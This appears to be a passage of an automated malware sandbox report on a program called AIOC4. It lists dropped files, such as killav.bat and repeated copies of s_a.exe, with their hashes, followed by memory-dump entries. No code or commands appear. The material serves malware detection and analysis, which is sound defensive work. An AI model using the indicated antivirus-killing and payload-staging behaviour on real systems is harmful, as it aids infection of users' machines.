c5e143b5f381ac849e7a1b59a6dcbfa0

SHA1
12367ba9905921509f01b8b944af012011cc95b6

SHA256
b151764ecbb164f25f8aeca3b93e0a18b63d108bbb1f33982fe4eea46b8ecab9

SHA512
d7040e8e18bf200d8f6ac5bb653b4329cb2a38d8a96e6b0ca17b6e3f0a35bd68b32f32925fe6731b195a797f275607448a06594f0f2424b8b48fca3dfa144bfa

Download Submit
C:\Program Files\AIOC4\killav.bat
Filesize
448B

MD5
991b60b36849d825526f52f91103f85c

SHA1
600552d2079d5e3de59e0efadfe0ac5410097a18

SHA256
32eec7b1af575c602ebedbe257be2525ac6a4b071a7a6f893d82ae1febb37a63

SHA512
1cdeef69fcaf66c71162ea3f7d3769fc15f0e0af48907b6f9fa913ef2175e1f4fb1ff816f7eb22a9c5f2d12e4bfcaec0cd9b888133b37e2b29233f5d96ade84a

Download Submit
C:\Program Files\AIOC4\s_a.exe
Filesize
132KB

MD5
f9424f1dd434a16011c5e59e7f345721

SHA1
01798ca075c3259c3c4f151f271931db6954be22

SHA256
0fa181eca290a782dca587d91425ffe58f8d9ac83741998b6946b7ef5554dd99

SHA512
81155925cc3fee6f07b695049654cd6b2151264f3404eb3b10a87cdfac6c23323f36700e5e8fb9406d5bf7b36be072d0ab2218670d8a29b850f379612829d3f4

Download Submit
C:\Program Files\AIOC4\srv.txt
Filesize
208B

MD5
fe12e4d7d57f3a2855015f0f0e841843

SHA1
76515b96e69f883b7c0f9cb9fb4677ba82e8d87c

SHA256
fd84145774eb176e559521f72866f695df4e44896de9e714695ef060207fa4dd

SHA512
7dedb8311b1d5317bcb6e1bf125105d5288585f8aa172061d94cbcb45ca6973898f4dcde60576754d449bae2e48f6027f05252f7be462fee951e0ce0dd2c817e

Download Submit
C:\Program Files\AIOC4\task.txt
Filesize
774B

MD5
61a3af987f362999aa26489643a84ca7

SHA1
471471d22c67aba8a616ba5ceae653a16b96281d

SHA256
cfcf56009f58bfae8c164266639811a77a9d4da10e53c654d329a5f23f9798fa

SHA512
dccb3ad7aae64317ed00e4d5223e862fce0033c7da771762e7af6e1e0f5df40b2943658b65a8e087a23a309b79a9e9b3c0c2091d11a0b645334aafc60ec18c3e

Download Submit
C:\ProgramData\0.bat
Filesize
696B

MD5
18dc2f263efec1a4914a099c3b4fe231

SHA1
db9c6c9fc9d698e8a4b26a3cacdd225520b633e0

SHA256
e1af622e4ce234631053744c8e0a64ed26ee595594b21c970f4cdf40471f6d0d

SHA512
13bed2398ce8775768477f34c2fcc6de1a3d16e4aa7277307a024caeb66b52564f85e8ec483842bcf6d840a17566ae2fdca89bf4f83dc3b55d7028aabd2f032a

Download Submit
C:\ProgramData\Microsoft\s_a.exe
Filesize
132KB

MD5
f9424f1dd434a16011c5e59e7f345721

SHA1
01798ca075c3259c3c4f151f271931db6954be22

SHA256
0fa181eca290a782dca587d91425ffe58f8d9ac83741998b6946b7ef5554dd99

SHA512
81155925cc3fee6f07b695049654cd6b2151264f3404eb3b10a87cdfac6c23323f36700e5e8fb9406d5bf7b36be072d0ab2218670d8a29b850f379612829d3f4

Download Submit
C:\ProgramData\Microsoft\s_a.exe
Filesize
132KB

MD5
f9424f1dd434a16011c5e59e7f345721

SHA1
01798ca075c3259c3c4f151f271931db6954be22

SHA256
0fa181eca290a782dca587d91425ffe58f8d9ac83741998b6946b7ef5554dd99

SHA512
81155925cc3fee6f07b695049654cd6b2151264f3404eb3b10a87cdfac6c23323f36700e5e8fb9406d5bf7b36be072d0ab2218670d8a29b850f379612829d3f4

Download Submit
C:\ProgramData\s_a.exe
Filesize
132KB

MD5
f9424f1dd434a16011c5e59e7f345721

SHA1
01798ca075c3259c3c4f151f271931db6954be22

SHA256
0fa181eca290a782dca587d91425ffe58f8d9ac83741998b6946b7ef5554dd99

SHA512
81155925cc3fee6f07b695049654cd6b2151264f3404eb3b10a87cdfac6c23323f36700e5e8fb9406d5bf7b36be072d0ab2218670d8a29b850f379612829d3f4

Download Submit
C:\ProgramData\s_a.exe
Filesize
132KB

MD5
f9424f1dd434a16011c5e59e7f345721

SHA1
01798ca075c3259c3c4f151f271931db6954be22

SHA256
0fa181eca290a782dca587d91425ffe58f8d9ac83741998b6946b7ef5554dd99

SHA512
81155925cc3fee6f07b695049654cd6b2151264f3404eb3b10a87cdfac6c23323f36700e5e8fb9406d5bf7b36be072d0ab2218670d8a29b850f379612829d3f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AIOC4.exe.log
Filesize
1KB

MD5
f661ff45e7b42c646fcb90f1c2e31666

SHA1
1b6def458e0103c9381b1e23a146c3e07df6b7aa

SHA256
4b8d7704f31c146909d98001e9fa71606afc925bf995d0868292f0501f3f6615

SHA512
8bd019adde3503a0839220e70fa664f4e5966521ba139a1d2ca734687f5dd6a92d33ee6017c78437459fcb7e7608a1c184104efbece66acfbe634e9f0eea4c19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PrimaryScreen.exe.log
Filesize
434B

MD5
55cd82f1f37f86716011f6271ae32817

SHA1
c9206205ef4c787cf9fa55456dbfd29de3d685b5

SHA256
c66fe4787c6333e4e0759b3f041fea3c5abff4cebe577679308b5d09e284bc4f

SHA512
aa2a89420e046f0415bfbd4f88ba337c0b667da3a45c7968e80d463adbc583921cc32127d9b3a709d7040e78c82a913ee00f6195487c2020b6f178a6629d9a8c

Download Submit
C:\Users\Admin\Desktop\AIOC4.lnk
Filesize
1KB

MD5
742b959448ec8b485f76f6fa178f1417

SHA1
9ad9396cc60b77d09aa5e1bcc8cc16be7f37fbd9

SHA256
6d98229f5e460b3b6d771984f9d9ca2f294f781dcec2420fce389cd636d10c1f

SHA512
d699512069978b058b30d6f26e02bf893c184f3fde44bcd24e7cdc8fad832e04962983b39c8f04f450f6b3fe557f0d864ce0f080801d66a9ccaae919e63de6c3

Download Submit
C:\Users\Public\Desktop\AIOC工具箱客服联系方式.txt
Filesize
569B

MD5
7df51bfc8d82dbf95ef5b10c0e40470f

SHA1
6f4d4cd9b3a15ae89143c35ae3e0b95b8ae6cc96

SHA256
56971b9ab59fa313d3073c36c28e9e2bcc65bfe177cad1b26c6e8b9feed420c6

SHA512
b1bcbb425cbddffaeb6fb07a54d4d488921fda1543839383889c2aa4cfa2e5f2e343a79c3fa94c32e0a078cc6fa091f17edd1b78c2946223b453ea63274bf401

Download Submit
memory/396-191-0x0000000000000000-mapping.dmp

Download
memory/488-202-0x0000000000000000-mapping.dmp

Download
memory/492-236-0x00000000253D0000-0x000000002542C000-memory.dmp

Filesize
368KB

Download
memory/492-253-0x000000001C1C9000-0x000000001C1CF000-memory.dmp

Filesize
24KB

Download
memory/492-230-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/492-234-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/492-238-0x000000001E080000-0x000000001E090000-memory.dmp

Filesize
64KB

Download
memory/492-288-0x0000000001AA0000-0x0000000001AC2000-memory.dmp

Filesize
136KB

Download
memory/492-244-0x0000000026070000-0x00000000260FA000-memory.dmp

Filesize
552KB

Download
memory/492-241-0x000000001C1C9000-0x000000001C1CF000-memory.dmp

Filesize
24KB

Download
memory/804-232-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/868-159-0x0000000000000000-mapping.dmp

Download
memory/1116-185-0x0000000000000000-mapping.dmp

Download
memory/1136-211-0x0000000000000000-mapping.dmp

Download
memory/1140-179-0x0000000000000000-mapping.dmp

Download
memory/1244-170-0x0000000000000000-mapping.dmp

Download
memory/1252-174-0x0000000000000000-mapping.dmp

Download
memory/1376-226-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/1376-213-0x0000000000000000-mapping.dmp

Download
memory/1420-199-0x0000000000000000-mapping.dmp

Download
memory/1480-161-0x0000000000000000-mapping.dmp

Download
memory/1568-229-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/1568-223-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/1576-172-0x0000000000000000-mapping.dmp

Download
memory/1648-158-0x0000000000000000-mapping.dmp

Download
memory/1820-168-0x0000000000000000-mapping.dmp

Download
memory/1848-197-0x0000000000000000-mapping.dmp

Download
memory/1944-207-0x0000000000000000-mapping.dmp

Download
memory/1956-160-0x0000000000000000-mapping.dmp

Download
memory/2076-205-0x0000000000000000-mapping.dmp

Download
memory/2168-184-0x0000000000000000-mapping.dmp

Download
memory/2444-182-0x0000000000000000-mapping.dmp

Download
memory/2488-157-0x0000000000000000-mapping.dmp

Download
memory/2508-209-0x0000000000000000-mapping.dmp

Download
memory/2596-164-0x0000000000000000-mapping.dmp

Download
memory/2900-153-0x0000000000000000-mapping.dmp

Download
memory/2984-173-0x0000000000000000-mapping.dmp

Download
memory/3000-187-0x0000000000000000-mapping.dmp

Download
memory/3012-250-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3012-255-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3040-194-0x0000000000000000-mapping.dmp

Download
memory/3160-188-0x0000000000000000-mapping.dmp

Download
memory/3164-204-0x0000000000000000-mapping.dmp

Download
memory/3200-149-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3200-147-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3200-145-0x0000000000220000-0x0000000000248000-memory.dmp

Filesize
160KB

Download
memory/3200-138-0x0000000000000000-mapping.dmp

Download
memory/3224-212-0x0000000000000000-mapping.dmp

Download
memory/3272-190-0x0000000000000000-mapping.dmp

Download
memory/3276-163-0x0000000000000000-mapping.dmp

Download
memory/3356-186-0x0000000000000000-mapping.dmp

Download
memory/3364-177-0x0000000000000000-mapping.dmp

Download
memory/3396-175-0x0000000000000000-mapping.dmp

Download
memory/3460-167-0x0000000000000000-mapping.dmp

Download
memory/3472-181-0x0000000000000000-mapping.dmp

Download
memory/3536-155-0x0000000000000000-mapping.dmp

Download
memory/3544-254-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3544-264-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3544-242-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/3592-189-0x0000000000000000-mapping.dmp

Download
memory/3616-132-0x0000000000000000-mapping.dmp

Download
memory/3616-135-0x0000000000400000-0x000000000055A000-memory.dmp

Filesize
1.4MB

Download
memory/3648-178-0x0000000000000000-mapping.dmp

Download
memory/3744-180-0x0000000000000000-mapping.dmp

Download
memory/3760-206-0x0000000000000000-mapping.dmp

Download
memory/3876-183-0x0000000000000000-mapping.dmp

Download
memory/3980-208-0x0000000000000000-mapping.dmp

Download
memory/3984-196-0x0000000000000000-mapping.dmp

Download
memory/4072-195-0x0000000000000000-mapping.dmp

Download
memory/4080-203-0x0000000000000000-mapping.dmp

Download
memory/4348-198-0x0000000000000000-mapping.dmp

Download
memory/4544-154-0x0000000000000000-mapping.dmp

Download
memory/4548-152-0x000000001E520000-0x000000001E7C4000-memory.dmp

Filesize
2.6MB

Download
memory/4548-220-0x000000001E7D0000-0x000000001E956000-memory.dmp

Filesize
1.5MB

Download
memory/4548-146-0x00000000004C0000-0x0000000000C14000-memory.dmp

Filesize
7.3MB

Download
memory/4548-222-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/4548-148-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/4548-214-0x000000001ED00000-0x000000001F228000-memory.dmp

Filesize
5.2MB

Download
memory/4548-150-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/4548-142-0x0000000000000000-mapping.dmp

Download
memory/4576-166-0x0000000000000000-mapping.dmp

Download
memory/4592-201-0x0000000000000000-mapping.dmp

Download
memory/4700-200-0x0000000000000000-mapping.dmp

Download
memory/4704-193-0x0000000000000000-mapping.dmp

Download
memory/4712-176-0x0000000000000000-mapping.dmp

Download
memory/4776-218-0x0000000000EC0000-0x0000000000EC8000-memory.dmp

Filesize
32KB

Download
memory/4776-219-0x00007FFA66E40000-0x00007FFA67901000-memory.dmp

Filesize
10.8MB

Download
memory/4804-165-0x0000000000000000-mapping.dmp

Download
memory/4856-171-0x0000000000000000-mapping.dmp

Download
memory/4868-156-0x0000000000000000-mapping.dmp

Download
memory/4924-169-0x0000000000000000-mapping.dmp

Download
memory/4952-162-0x0000000000000000-mapping.dmp

Download
memory/5012-210-0x0000000000000000-mapping.dmp

Download
memory/5036-192-0x0000000000000000-mapping.dmp

Download